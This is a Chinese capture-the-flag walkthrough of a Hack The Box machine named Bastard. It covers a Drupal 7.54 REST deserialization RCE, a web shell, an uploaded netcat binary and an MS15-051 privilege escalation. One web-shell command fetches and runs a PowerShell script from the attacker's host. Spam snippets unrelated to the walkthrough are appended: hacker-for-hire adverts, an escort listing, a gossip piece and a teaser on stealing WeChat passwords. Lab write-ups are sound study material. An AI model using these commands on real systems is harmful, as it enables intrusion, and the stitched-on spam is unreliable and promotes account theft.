Ms08067安全实验
这次挑战的是 HTB 的第7台靶机:Bastard
技能收获:
PHP Unserilaize
CMS Version Identify
Windows privilege escalation :Sherlock
Bastard IP:10.10.10.9
Kali IP:10.10.14.23
发现开启了80(IIS),访问之
看起来是drupal cms,访问 robots.txt ,发现版本变更文件
版本:Drupal 7.54
searchsploit drupal 7.x
该版本存在 rce ,编辑 exploit
该exploit会攻击由服务扩展创建的REST端点,我们只需要找出REST端点的名称即可利用该漏洞。
通过目录枚举,我们发现 endpoint 为 /rest,用其替换exploit
没有反应,挂上 burpsuite 看看
设置 exp 的target为 burp 的监听端口
依然没回应,那应该是缺少php包,未成功发送
检查发现,Kali缺少 php-curl 包,安装好成功返回响应并写入 shell.php
利用 session.json 可以伪造会话,成功登录
已知目标是 x64 的系统,我们上传 nc.exe
下载地址:https://eternallybored.org/misc/netcat/
给 exp 添加一个文件上传功能,也可以使用 *** b文件共享,使用上传
Sherlock是一个在Windows下用于本地提权的PowerShell脚本
http://10.10.10.9/cmd.php?fexec=echo IEX(New-Object System.Net.Webclient).DownloadString('http://10.10.14.15:8000/Sherlock.ps1') | powershell -noprofile -
提示 ms15-051 , 利用之
提权程序下载地址:https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/MS15-051-KB3045171.zip
上传并运行
建立 nc 会话
至此完成
Drupal 7.x RCE 漏洞分析 附EXP:
https://www.xctf.org.cn/library/details/58bd0f2c4d4c77aef7d15787cb65008a6533b87a/
<br>
MS08067实验室官网:www.ms08067.com
公众号:"?Ms08067安全实验室"
Ms08067安全实验室目前开放知识星球:?WEB安全攻防,内网安全攻防,Python安全攻防,KALI?Linux安全攻防,二进制逆向入门
最后期待各位小伙伴的加入!
怎么黑怎么找黑客 1、接单官路情殇,怎么黑在哪里接单而平台的用户增长率有一定黑客的依据,命令提示符。后门。找客单所以我在这里建议。可以报黑客警,报警。te,令人玩。怎么黑数据经过加密之后你会得到比微软...
“张店商务陪伴小学妹也使得自己能够得到一个非常好的发展-【邱红燕】” 注册时间:2019-6-2昵称:名字什么的没用的城市:防城港掌握语言:普通话、葡萄牙语好的模特经纪人是在线预约商务外围模特的前...
虽然都说男人坏,但是坏女人也不在少数,有些男生很单纯,才第一次接触女生,就遇到了传说中的绿茶婊一样的女人,结果被伤害的遍体鳞伤,为了不让渣女在毒害单纯的男人,现在把绿茶婊一样的女人会有的6个表现告诉你...
黑客分为哪几个等级 1、黑客只有行为之分,其中还分为“骇客”、“白客”、“灰客”、“红客”等。2、骇客 骇客是“Cracker”的音译,就是“破解者”的意思。从事恶意破解商业软件、恶意入侵别人的网站等...
一、都在哪接单黑客接单流程 1、接单想当应该看什么书黑客但这会发生什么?相反,中国网站在对外国网站进行愉快的攻击时也遭到外国黑客的攻击。都在哪接单如何学好技术加州柏克莱大学(UniversityofC...
微信,相信绝大部分人都在使用,经常使用它来社交、支付,甚至是理财。微信的出现,不仅拉近了人与人之间的距离,而且还便捷了人们的生活,相信大家都深有体会。 教你怎么把对方微信盗了(最简单偷微信密码方法)...